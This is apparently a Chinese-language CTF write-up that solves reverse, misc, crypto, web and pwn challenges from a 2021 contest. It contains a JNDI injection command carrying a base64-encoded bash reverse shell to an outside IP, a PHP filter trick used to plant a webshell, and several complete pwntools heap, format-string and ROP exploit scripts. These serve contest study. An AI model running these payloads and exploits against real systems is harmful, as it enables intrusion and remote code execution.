from hashlib import * import hmac a = [4,10,15,1,14,5,11,8] b = ["WIgD1ZNZ0ilJqFpw", "4811tjOZjoiXpjdq", "ALFjcgztxnUaC89v", "ZgHzTu79Zwhoi0PB", "UYBfajKYrDFE1zJs", "yr4PBIjlJg89FpP3", "SFHqaTYDf7EeEevX", "gUwrqaE3nCxKr4Du"] for i in range(len(b)): b[i] = md5(b[i].encode()).digest() final = ["fc7466e55fbf37b1", "78b0be39e63b6837", "c2f9c805d0442203", "c11a61bb60d79dab", "869e650ee55bd9f6", "f2dda5fc021fe2bf", "305044db48fe6174", "d6659b5e2d1059f8"] def burp_512(order,key): for i in range(0x20,0x7f): for j in range(0x20,0x7f): for k in range(0x20,0x7f): for l in range(0x20,0x7f): tmp = bytes([i, j, k, l]) if hmac.new(key, tmp, sha512).hexdigest()[:16] == final[order]: print(tmp) break for i in range(len(a)): if (a[i] >> 3) & 1: burp_512(i,b[a[i]&7])
SHA-384:
from hashlib import * import hmac key = 0 for i in range(0x20,0x7f): for j in range(0x20,0x7f): for k in range(0x20,0x7f): for l in range(0x20,0x7f): tmp = bytes([i, j, k, l]) if sha384(tmp).hexdigest()[:16] == 'f2dda5fc021fe2bf': print(tmp)
MD5:
from hashlib import * import hashlib for i in range(0x20,0x7f): for j in range(0x20,0x7f): for k in range(0x20,0x7f): for l in range(0x20,0x7f): tmp = bytes([i, j, k, l]) if hashlib.md5(tmp).hexdigest()[:16] == 'c11a61bb60d79dab': print(tmp)
拼接起来得到flag为 FLAG{H@5H_15_7H3_8@PP1N355_C11P}
Misc
1、WeirdPhoto
crc32爆破得到真正的宽和高
#Python3爆 png长和高 import binascii import struct for i in range(20000):#一般 20000就够 wide = struct.pack('>i',i) for j in range(20000): high = struct.pack('>i',j) data = b'\x49\x48\x44\x52' + wide+ high+b'\x08\x06\x00\x00\x00' #因为是 Py3,byte和str型不能直接进行运算,要把 str写 b'...'。不然把 wide和 high写成 str(...) crc32 = binascii.crc32(data) & 0xffffffff if crc32 == 0x9E916964: # 0x9E916964是这个 png文件头的 CRC校验码,在 21~25byte处 print('\n\n',i,j,crc32) print(type(data)) exit(0) print(i, end=' ')
运行后爆破出真实的宽为1420,高为500,在winhex中修改后保存
打开图片,已被还原
猜了半天,猜到是栅栏密码,而且key为4
解开之后里面有一份out文件
搜索头文件里面的/BitsPerComponent
发现将原pdf文件4字节改了,应该是在pdf文件中隐藏了flag
恢复pdf文件
用wbStego4恢复,得到flag
flag{th1s_ls_thE_f1n4l_F14g_y0u_want}
Crypto
签到
flag{GaqY7KtEtrVIX1Q5oP5iEBRCYXEAy8rT}
Web
1、zerocalc
读到
readFile('./src/index.js') = const express = require("express"); const path = require("path"); const fs = require("fs"); const notevil = require("./notevil"); // patched something... const crypto = require("crypto"); const cookieSession = require("cookie-session"); const app = express(); app.use(express.urlencoded({ extended: true })); app.use(express.json()); app.use(cookieSession({ name: 'session', keys: [Math.random().toString(16)], })); //flag in root directory but name is randomized const utils = { async md5(s) { return new Promise((resolve, reject) = >{ resolve(crypto.createHash("md5").update(s).digest("hex")); }); }, async readFile(n) { return new Promise((resolve, reject) = >{ fs.readFile(n, (err, data) = >{ if (err) { reject(err); } else { resolve(data); } }); }); }, } const template = fs.readFileSync("./static/index.html").toString(); function render(s) { return template.replace("{{res}}", s.join(' ')); } app.use("/", async(req, res) = >{ const e = req.body.e; const his = req.session.his || []; if (e) { try { const ret = (await notevil(e, utils)).toString(); his.unshift(`$ { e } = $ { ret }`); if (his.length > 10) { his.pop(); } } catch(error) { console.log(error); his.add(`$ { e } = wrong ? `); } req.session.his = his; } res.send(render(his)); }); app.use((err, res) = >{ console.log(err); res.redirect('/'); }); app.listen(process.env.PORT || 8888);
网卡信息网络信息啥的都能直接读,读flag试试
2、Jack-Shiro
上半年2021红明谷+本月初2021天翼杯原题,这是比赛中第三次出现了
jackson反序列化打spring,反弹shell命令用国光师傅的bash-2不会被过滤:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaC AtaSA+JiAvZGV2L3RjcC84MS43MC41OS4xMTIvMTg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}" -A "81.70.59.112"
提前监听着18888端口
然后postman发送时候/;/json路由可以绕过shiro
["ch.qos.logback.core.db.JNDIConnectionSource",{"jndiLocation":"rmi://81.70.59.112:1099/ifzli2"}]
就有shell了:
3、new_hospital
dirsearch扫描下,没源码泄露啥的
200 7B http://123.60.75.243:32767/flag.php 200 6KB http://123.60.75.243:32767/footer.php 200 898B http://123.60.75.243:32767/header.php 200 30KB http://123.60.75.243:32767/index.php 200 30KB http://123.60.75.243:32767/index.php/login/ 200 3KB http://123.60.75.243:32767/js/ 200 18KB http://123.60.75.243:32767/news.php 301 321B http://123.60.75.243:32767/old -> REDIRECTS TO: http://123.60.75.243:32767/old/ 200 28KB http://123.60.75.243:32767/old/ 200 19KB http://123.60.75.243:32767/online.php
直接访问flag.php没权限
有一个/old 估计是老站,也扫了一遍,这个里面倒是没flag.php
都点点各个页面,找到一个进去就有报错信息的
更改id参数,发现访问内容是由id参数决定的。
想到扫到的/old这个站,也进去了,发现不是由id参数决定的,第一次进去后,更改id参数,get到的结果是不变的。
如果一开始访问时候cookie是2.js,id无论怎么咋改,都还是file_get_contents(2.js)
猜测由cookie字段决定的访问内容
更改cookie为flag.php的目录:
4、EasyFilter
php伪协议的二次读入流读时解码即可
<?php ini_set("open_basedir","./"); if(!isset($_GET['action'])){ highlight_file(__FILE__); die(); } if($_GET['action'] == 'w'){ @mkdir("./files/"); $content = $_GET['c']; $file = bin2hex(random_bytes(5)); file_put_contents("./files/".$file,base64_encode($content)); echo "./files/".$file; }elseif($_GET['action'] == 'r'){ $r = $_GET['r']; $file = "./files/".$r; include("php://filter/resource=$file"); }
写phpinfo 到 a0e57a3048
http://124.70.181.14:32768/?action=w&c=%3C?php%20phpinfo();?%3E
打出phpinfo,目录的../个数一层一层试好像只有这么多个的时候才能触发
http://124.70.181.14:32768/?action=r&r=php://filter/read=convert.base64-decode/resource=../../../../../../files/a0e57a3048
写马 64ee041d34
http://124.70.181.14:32768/?action=r&r=php://filter/read=convert.base64-decode/resource=../../../../../../files/64ee041d34
post数据即可
pwn
1、bitflip
libc2.27 off by one , 给的bitflip的功能并没有用到
#!usr/bin/env python #-*- coding:utf8 -*- from pwn import * import sys pc="./bitflip" reomote_addr=["124.71.130.185",49155] elf = ELF(pc) libc = elf.libc context.binary=pc context.terminal=["gnome-terminal",'-x','sh','-c'] if len(sys.argv)==1: context.log_level="debug" p=process(pc) if len(sys.argv)==2 : if 'r' in sys.argv[1]: p = remote(reomote_addr[0],reomote_addr[1]) if 'n' not in sys.argv[1]: context.log_level="debug" ru = lambda x : p.recvuntil(x,timeout=0.2) sn = lambda x : p.send(x) rl = lambda : p.recvline() sl = lambda x : p.sendline(x) rv = lambda x : p.recv(x) sa = lambda a,b : p.sendafter(a,b) sla = lambda a,b : p.sendlineafter(a,b) itr= lambda :p.interactive() ru7f = lambda : u64(ru('\x7f')[-6:].ljust(8,'\x00')) rv6 = lambda : u64(rv(6)+'\x00'*2) lg = lambda s: log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s))) bp = lambda src=None : attach(p,src) og = lambda libcpwd : map(int, subprocess.check_output(['one_gadget', '--raw', libcpwd]).split(' ')) what_choice="Your choice: " ch_add="1" ch_dele="4" ch_edit="2" ch_show="3" what_size="Size: " what_c="Content: " what_idx="Index: " def add(idx,size): ru(what_choice) sl(ch_add) ru(what_idx) sl(str(idx)) ru(what_size) sl(str(size)) def dele(idx): ru(what_choice) sl(ch_dele) ru(what_idx) sl(str(idx)) def edit(idx,c): ru(what_choice) sl(ch_edit) ru(what_idx) sl(str(idx)) ru(what_c) sl(c) ## def show(idx): ru(what_choice) sl(ch_show) ru(what_idx) sl(str(idx)) ru(what_c) add(0,8) add(1,8) dele(0) dele(1) add(0,0x18) show(0) heap_addr = rv6() -0x260 lg('heap_addr') add(2,0x30) add(3,0x48) edit(0,'a'*0x18+'\x91') add(4,0x30) add(5,0x48) edit(3,'a'*0x48+'\x91') add(6,0x30) add(7,0x48) edit(5,'a'*0x48+'\x91') add(8,0x30) add(9,0x48) edit(7,'a'*0x48+'\x91') add(10,0x30) add(11,0x48) edit(9,'a'*0x48+'\x91') add(12,0x30) add(13,0x48) edit(11,'a'*0x48+'\x91') add(14,0x30) add(15,0x48) edit(13,'a'*0x48+'\x91') add(16,0x30) add(17,0x48) edit(15,'a'*0x48+'\x91') add(18,0x30) for i in range(8): dele(2*(i+1)) add(19,0x50) show(19) libc_base = ru7f() - 0x3ebd20 lg('libc_base') free_hook = libc_base + libc.sym['__free_hook'] sys_addr = libc_base + libc.sym['system'] dele(15) dele(17) edit(19, 'a'*0x38+p64(0x51)+p64(free_hook)) add(20,0x40) add(21,0x40) edit(20, '/bin/sh\x00') edit(21, p64(sys_addr)) dele(20) src=''' # x/10xg $rebase() # b *$rebase(0xd43) bin heap ''' # bp(src) itr()
2、old_school
libc2.27 off by one
# -*- coding: utf-8 -*- from pwn import* from ctypes import * context.log_level='debug' context.arch='amd64' context.os = "linux" local = 0 if local: r = process('./old_school') else: r = remote("121.36.194.21", 49153) sa = lambda s,n : r.sendafter(s,n) sla = lambda s,n : r.sendlineafter(s,n) sl = lambda s : r.sendline(s) sd = lambda s : r.send(s) rc = lambda n : r.recv(n) ru = lambda s : r.recvuntil(s) ti = lambda: r.interactive() libc = ELF("./libc-2.27.so") def debug(): gdb.attach(r) pause() def lg(s,addr): print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr)) def add(index, size): sla("Your choice: ", "1") sla("Index: ", str(index)) sla("Size: ", str(size)) def edit(index, content): sla("Your choice: ", "2") sla("Index: ", str(index)) sa("Content: ", content) def show(index): sla("Your choice: ", "3") sla("Index: ", str(index)) def delete(index): sla("Your choice: ", "4") sla("Index: ", str(index)) for i in range(7): add(i, 0xf8) #0-6 add(7, 0x88) #7 add(8, 0xe8) #8 add(9, 0xf8) #9 add(10, 0x10) #10 edit(10, "/bin/sh\x00" + '\n') for i in range(7): delete(i) for i in range(7): add(i, 0x88) for i in range(7): delete(i) delete(7) edit(8, "a" * 0xe0 + p64(0x180) + '\x00') delete(9) for i in range(7): add(i, 0x88) add(7, 0x88) #7 show(8) malloc_hook = (u64(r.recvuntil('\x7f')[-6:].ljust(8, "\x00")) & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF) libc_base = malloc_hook - libc.sym['__malloc_hook'] free_hook = libc_base + libc.sym["__free_hook"] system_addr = libc_base + libc.sym["system"] lg("libc_base", libc_base) add(11, 0xe0) #11 delete(11) edit(8, p64(free_hook) + '\n') #debug() add(12, 0xe0) #12 add(13, 0xe0) #13 edit(13, p64(system_addr) + '\n') delete(10) r.interactive()
3、random_heap
libc2.27 uaf
堆随机起来了,考虑爆破。
坚持不懈的跑通了
# -*- coding: utf-8 -*- from pwn import* from ctypes import * #context.log_level='debug' context.arch='amd64' context.os = "linux" #context.terminal = ["tmux", "splitw", "-h"] local = 0 if local: r = process('./random_heap') else: r = remote("124.71.140.198", 49153) sa = lambda s,n : r.sendafter(s,n) sla = lambda s,n : r.sendlineafter(s,n) sl = lambda s : r.sendline(s) sd = lambda s : r.send(s) rc = lambda n : r.recv(n) ru = lambda s : r.recvuntil(s) ti = lambda: r.interactive() libc = ELF("./libc-2.27.so") libcc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6") def debug(): gdb.attach(r) pause() def lg(s,addr): print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr)) def add(index, size): sla("Your choice: ", "1") sla("Index: ", str(index)) sla("Size: ", str(size)) def edit(index, content): sla("Your choice: ", "2") sla("Index: ", str(index)) sla("Content: ", content) def show(index): sla("Your choice: ", "3") sla("Index: ", str(index)) def delete(index): sla("Your choice: ", "4") sla("Index: ", str(index)) v0 = libcc.time(0) libcc.srand(v0) for i in range(64): add(i, 0x80) a = libcc.rand() for i in range(64): delete(i) s = "" for i in range(64): show(i) s = ru("\n") if len(s) > 15 and s[14] == '\x7f': break malloc_hook = (u64(s[9:15].ljust(8, "\x00")) & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF) libc_base = malloc_hook - libc.sym['__malloc_hook'] free_hook = libc_base + libc.sym["__free_hook"] system_addr = libc_base + libc.sym["system"] lg("libc_base", libc_base) for i in range(64): edit(i, p64(free_hook)) ss = ['a','a','a','a','a','a','a','a','a','a','a','a','a','a','a','a','a','a'] for i in range(63): add(i, 0x80) edit(i, '/bin/sh\x00') a = libcc.rand() & 0xf print int(a) if ss[int(a)] == 'b': edit(i, p64(system_addr)) break ss[int(a)] = "b" print ss delete(0) sl("cat flag") r.interactive()
4、sonic
栈溢出,给定程序基地址,且题目中已经有cli的路径,覆盖login_path为usr/bin/cli的地址即可
Exp:
#!usr/bin/env python #-*- coding:utf8 -*- from pwn import * import sys pc="./sonic" reomote_addr=["123.60.63.90",6890] elf = ELF(pc) libc = elf.libc context.binary=pc context.terminal=["gnome-terminal",'-x','sh','-c'] if len(sys.argv)==1: context.log_level="debug" p=process(pc) if len(sys.argv)==2 : if 'r' in sys.argv[1]: p = remote(reomote_addr[0],reomote_addr[1]) if 'n' not in sys.argv[1]: context.log_level="debug" ru = lambda x : p.recvuntil(x,timeout=0.2) sn = lambda x : p.send(x) rl = lambda : p.recvline() sl = lambda x : p.sendline(x) rv = lambda x : p.recv(x) sa = lambda a,b : p.sendafter(a,b) sla = lambda a,b : p.sendlineafter(a,b) itr= lambda :p.interactive() ru7f = lambda : u64(ru('\x7f')[-6:].ljust(8,'\x00')) rv6 = lambda : u64(rv(6)+'\x00'*2) lg = lambda s: log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s))) bp = lambda src=None : attach(p,src) og = lambda libcpwd : map(int, subprocess.check_output(['one_gadget', '--raw', libcpwd]).split(' ')) ru("main Address=0x") pie = int(rv(12),16) -0x7cf lg('pie') src=''' # x/10xg $rebase() b *$rebase(0x7fb) c ''' # bp(src) main = pie+0x7cf login_path = pie+0x201010 username = pie + 0x201040 ru("login:") p_rdi = pie+0x8c3 p_rsi_r15 = pie + 0x8c1 printf = pie + 0x5f0 execve = pie + 0x610 gets = pie+0x600 pay = flat([ '\x00'*0x28, p_rdi, login_path, gets, main, ]) sl(pay) sleep(0.1) sl(p64(pie+0x901)) ru("login:") sl(p64(0)) itr() ''' 0x00000000000008c3 : pop rdi ; ret 0x00000000000008c1 : pop rsi ; pop r15 ; ret '''
5、old_school_revenge
2.27 off by null
# -*- coding: utf-8 -*- from pwn import* from ctypes import * context.log_level='debug' context.arch='amd64' context.os = "linux" #context.terminal = ["tmux", "splitw", "-h"] local = 0 if local: r = process('./old_school_revenge') else: r = remote("123.60.63.39",49153) sa = lambda s,n : r.sendafter(s,n) sla = lambda s,n : r.sendlineafter(s,n) sl = lambda s : r.sendline(s) sd = lambda s : r.send(s) rc = lambda n : r.recv(n) ru = lambda s : r.recvuntil(s) ti = lambda: r.interactive() libc = ELF("./libc-2.27.so") def debug(): gdb.attach(r) pause() def lg(s,addr): print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr)) def add(index, size): sla("Your choice: ", "1") sla("Index: ", str(index)) sla("Size: ", str(size)) def edit(index, content): sla("Your choice: ", "2") sla("Index: ", str(index)) sla("Content: ", content) def show(index): sla("Your choice: ", "3") sla("Index: ", str(index)) def delete(index): sla("Your choice: ", "4") sla("Index: ", str(index)) for i in range(7): add(i, 0xf8) #0-6 add(7, 0x88) #7 add(8, 0xe8) #8 add(9, 0xf8) #9 add(10, 0x10) #10 edit(10, "/bin/sh\x00" + '\n') for i in range(7): delete(i) for i in range(7): add(i, 0x88) for i in range(7): delete(i) delete(7) edit(8, "a" * 0xe0 + p64(0x180)) delete(9) for i in range(7): add(i, 0x88) add(7, 0x88) #7 show(8) malloc_hook = (u64(r.recvuntil('\x7f')[-6:].ljust(8, "\x00")) & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF) libc_base = malloc_hook - libc.sym['__malloc_hook'] free_hook = libc_base + libc.sym["__free_hook"] system_addr = libc_base + libc.sym["system"] lg("libc_base", libc_base) add(11, 0xe0) #11 delete(11) edit(8, p64(free_hook) + '\n') #debug() add(12, 0xe0) #12 add(13, 0xe0) #13 edit(13, p64(system_addr) + '\n') #debug() delete(10) r.interactive()
6、oldecho
典型的格式化字符串漏洞,格式化字符串在bss段上,需要通过栈链来任意地址写,构造较为麻烦;
close(1)之后,无法正常输出,可以想办法可以改stdout的fileno为2,重定向到stderr;
这里先把返回地址改成main函数的首地址,使得栈抬高:
改之前:
改之后:
再次走到格式化字符串的位置,把返回地址改为ret,滑动到start函数的首地址:
然后栈上就会留下一个stdout指针:
然后把stdout的fileno改成2,就可以正常输出,泄露程序基地址和libc地址,之后在bss上布置orw,劫持rbp然后栈迁移到bss上执行即可读flag。
栈地址随机,要爆破几次
#!usr/bin/env python #-*- coding:utf8 -*- from pwn import * import sys pc="./oldecho" reomote_addr=["123.60.32.152",49155] elf = ELF(pc) libc = elf.libc context.binary=pc context.terminal=["gnome-terminal",'-x','sh','-c'] if len(sys.argv)==1: context.log_level="debug" p=process(pc) if len(sys.argv)==2 : if 'r' in sys.argv[1]: p = remote(reomote_addr[0],reomote_addr[1]) if 'n' not in sys.argv[1]: context.log_level="debug" ru = lambda x : p.recvuntil(x,timeout=0.2) sn = lambda x : p.send(x) rl = lambda : p.recvline() sl = lambda x : p.sendline(x) rv = lambda x : p.recv(x) sa = lambda a,b : p.sendafter(a,b) sla = lambda a,b : p.sendlineafter(a,b) itr= lambda :p.interactive() ru7f = lambda : u64(ru('\x7f')[-6:].ljust(8,'\x00')) rv6 = lambda : u64(rv(6)+'\x00'*2) lg = lambda s: log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s))) bp = lambda src=None : attach(p,src) og = lambda libcpwd : map(int, subprocess.check_output(['one_gadget', '--raw', libcpwd]).split(' ')) def edit(offset,value): sl('%{}c%{}$hhn'.format(value,offset)) sleep(3) ru("Gift: 0x") stack_addr = int(rv(12),16) src=''' b *$rebase(0xdbd) c ''' p0,p1,p2 = 6,10,13 p1_addr = stack_addr+0x8 p2_addr = stack_addr+0x20 ret_addr = stack_addr - 0x10 edit(p0, u8(p64(p2_addr)[0]) ) edit(p1, u8(p64(ret_addr)[0]) ) edit(p0, u8(p64(p2_addr)[0])+1 ) edit(p1, u8(p64(ret_addr)[1])) edit(p0, u8(p64(p2_addr)[0])+2 ) edit(p1, u8(p64(ret_addr)[2])) edit(p0, u8(p64(p2_addr)[0])+3 ) edit(p1, u8(p64(ret_addr)[3])) edit(p0, u8(p64(p2_addr)[0])+4 ) edit(p1, u8(p64(ret_addr)[4])) edit(p0, u8(p64(p2_addr)[0])+5 ) edit(p1, u8(p64(ret_addr)[5])) edit(p0, u8(p64(p2_addr)[0]) ) #restore # bp(src) edit(p2, 0x40) #0x40 p0+=4 p1+=2 p2+=2 new_ret = stack_addr-0x38 edit(p1, u8(p64(new_ret)[0])) edit(p0, u8(p64(p2_addr)[0])+1) edit(p1, u8(p64(new_ret)[1])) edit(p0, u8(p64(p2_addr)[0])) #restore # bp(src) edit(p2, 0x3f) # E3F retn stdout_addr = stack_addr -0x80 p2_addr = stack_addr -0x10 p0=15 p1=41 p2=43 p_stdout = 29 edit(p1, u8(p64(stdout_addr)[0])) edit(p0, u8(p64(p2_addr)[0])+1) edit(p1, u8(p64(stdout_addr)[1])) edit(p0, u8(p64(p2_addr)[0])) #restore edit(p2, 0x90) edit(p_stdout, 0x2) # bp(src) sl('%9$p%29$p') ru('0x') pie = int(rv(12),16)-0x202040 libc_base = int(rv(14),16) - 0x3c5690 # ''' # 0x0000000000021112 : pop rdi ; ret # 0x00000000000202f8 : pop rsi ; ret # 0x00000000001436b1 : pop rax ; pop rdx ; pop rbx ; ret # 0x00000000000bc3f5: syscall; ret; # ''' fmt_addr = pie + 0x202040 p_rdi = libc_base +0x0000000000021112 p_rsi = libc_base +0x00000000000202f8 p_rax_rdx_rbx = libc_base +0x00000000001436b1 syscall = libc_base +0x00000000000bc3f5 ret = p_rdi+1 #rdi+0xa0=rop_base,+0xa8=ret flag_str_addr = pie + 0x202020 orw_base = fmt_addr + 0x10 rop_base=fmt_addr +0x20 #注意rop_base flag_addr=orw_base ORW=flat([ './flag'.ljust(0x10,'\x00'), p_rdi,flag_addr, p_rsi,4, p_rax_rdx_rbx,2,4,0, syscall, p_rdi,1, p_rsi,flag_str_addr, p_rax_rdx_rbx,0,0x50,0, syscall, p_rdi,2, p_rsi,flag_str_addr, p_rax_rdx_rbx,1,0x40,0, syscall ]) rop_base_addr = stack_addr -0x138 rop_base -= 8 edit(p1, u8(p64(rop_base_addr)[0])) edit(p0, u8(p64(p2_addr)[0])+1) edit(p1, u8(p64(rop_base_addr)[1])) edit(p0, u8(p64(p2_addr)[0])) #restore # bp(src) edit(p2, u8(p64(rop_base)[0])) edit(p1, u8(p64(rop_base_addr)[0])+1) edit(p2, u8(p64(rop_base)[1])) edit(p1, u8(p64(rop_base_addr)[0])+2) edit(p2, u8(p64(rop_base)[2])) edit(p1, u8(p64(rop_base_addr)[0])+3) edit(p2, u8(p64(rop_base)[3])) edit(p1, u8(p64(rop_base_addr)[0])+4) edit(p2, u8(p64(rop_base)[4])) edit(p1, u8(p64(rop_base_addr)[0])+5) # bp(src) edit(p2, u8(p64(rop_base)[5])) leave_ret = pie+0xe3e leave_ret_addr = stack_addr -0x128 edit(p1, u8(p64(leave_ret_addr)[0])) #restore edit(p2, u8(p64(leave_ret)[0])) edit(p1, u8(p64(leave_ret_addr)[0])+1) #restore edit(p2, u8(p64(leave_ret)[1])) edit(p1, u8(p64(leave_ret_addr-8)[0])) #restore # bp(src) pay = '%{}c%{}$hhn'.format(0x3f,p2) pay = pay.ljust(0x10,'a') + ORW sl(pay) lg('pie') lg('libc_base') lg('stack_addr') itr()
7、bornote
libc-2.31 off by null
开始时随机申请了一个size的chunk,所以调试前先patch一下,最后爆破成功的概率1/16
#!usr/bin/env python #-*- coding:utf8 -*- from pwn import * import sys pc="./bornote" reomote_addr=["121.36.250.162",49155] elf = ELF(pc) libc = elf.libc context.binary=pc context.terminal=["gnome-terminal",'-x','sh','-c'] if len(sys.argv)==1: context.log_level="debug" p=process(pc) if len(sys.argv)==2 : if 'r' in sys.argv[1]: p = remote(reomote_addr[0],reomote_addr[1]) if 'n' not in sys.argv[1]: context.log_level="debug" ru = lambda x : p.recvuntil(x,timeout=0.2) sn = lambda x : p.send(x) rl = lambda : p.recvline() sl = lambda x : p.sendline(x) rv = lambda x : p.recv(x) sa = lambda a,b : p.sendafter(a,b) sla = lambda a,b : p.sendlineafter(a,b) itr= lambda :p.interactive() ru7f = lambda : u64(ru('\x7f')[-6:].ljust(8,'\x00')) rv6 = lambda : u64(rv(6)+'\x00'*2) lg = lambda s: log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s))) bp = lambda src=None : attach(p,src) og = lambda libcpwd : map(int, subprocess.check_output(['one_gadget', '--raw', libcpwd]).split(' ')) what_choice="cmd: " ch_add="1" ch_dele="2" ch_edit="3" ch_show="4" what_size="Size: " what_c="Note: " what_idx="Index: " def add(size): ru(what_choice) sl(ch_add) ru(what_size) sl(str(size)) def dele(idx): ru(what_choice) sl(ch_dele) ru(what_idx) sl(str(idx)) def edit(idx,c): ru(what_choice) sl(ch_edit) ru(what_idx) sl(str(idx)) ru(what_c) sl(c) ## def show(idx): ru(what_choice) sl(ch_show) ru(what_idx) sl(str(idx)) ru(what_c) libc_base = 0 heap_base = 0 def leak(): global libc_base ru("username: ") sl('Y1f4n') # max_count 10 size 0-0x654 add(0x90) #0 add(0x28) #1 add(0x28) #2 add(0x4f0) #3 add(0x28) #4 dele(3) add(0x4f0) show(3) # libc_base = ru7f() - 0x1ebbe0 # lg('libc_base') def game(): global heap_base dele(2) dele(1) add(0x28) add(0x28) show(1) heap_base = rv6() - 0x13030-0x40 lg('heap_base') pay = flat([ 0,0xf1, heap_base+0x12fb0,heap_base+0x12fb0, heap_base+0x12fa0,heap_base+0x12fa0 ]) edit(0,pay) edit(2, 'a'*0x20+p64(0xf0)) dele(3) add(0xe0) #3 dele(2) dele(1) free_hook = libc_base + libc.sym['__free_hook'] sys_addr = libc_base + libc.sym['system'] pay = flat([ 'a'*0x80, 0,0x31, free_hook ]) edit(3,pay) add(0x28) add(0x28) edit(1, '/bin/sh\x00') edit(2, p64(sys_addr)) dele(1) src=''' heap bin ''' # bp(src) while True: try: leak() s=p.recvuntil('\x7f',timeout=0.2) ## if len(s)==0: raise Exception('') libc_base=u64(s[-6:]+'\x00'*2) - 0x1ebbe0 break except Exception: p.close() p=process(pc) p = remote(reomote_addr[0],reomote_addr[1]) continue game() lg('libc_base') sl('cat flag') itr()
8、pwnpwn
给程序基地址,泄露canary,栈溢出
# -*- coding: utf-8 -*- from pwn import* from ctypes import * context.log_level='debug' context.arch='amd64' context.os = "linux" #context.terminal = ["tmux", "splitw", "-h"] local = 0 if local: r = process('./pwnpwn') else: r = remote("124.71.156.217", 49153) sa = lambda s,n : r.sendafter(s,n) sla = lambda s,n : r.sendlineafter(s,n) sl = lambda s : r.sendline(s) sd = lambda s : r.send(s) rc = lambda n : r.recv(n) ru = lambda s : r.recvuntil(s) ti = lambda: r.interactive() libc = ELF("./libc-2.23.so") libcc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6") def debug(): gdb.attach(r) pause() def lg(s,addr): print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr)) sla("welcome to mimic world,try something\n", "1") ru("0x") vuln_addr = int(rc(12), 16) shell_addr = vuln_addr - 0x94 pie = vuln_addr - 0x9b9 bin_sh = pie + 0x202010 pop_rdi = pie + 0xb83 system_addr = pie + 0x951 lg("pie", pie) sl("2") sa("hello", "a" * 0x69) ru("a" * 0x69) canary = u64('\x00' + rc(7)) lg("canary", canary) sl("a" * 0x68 + p64(canary) + 'a' * 8 + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)) r.interactive()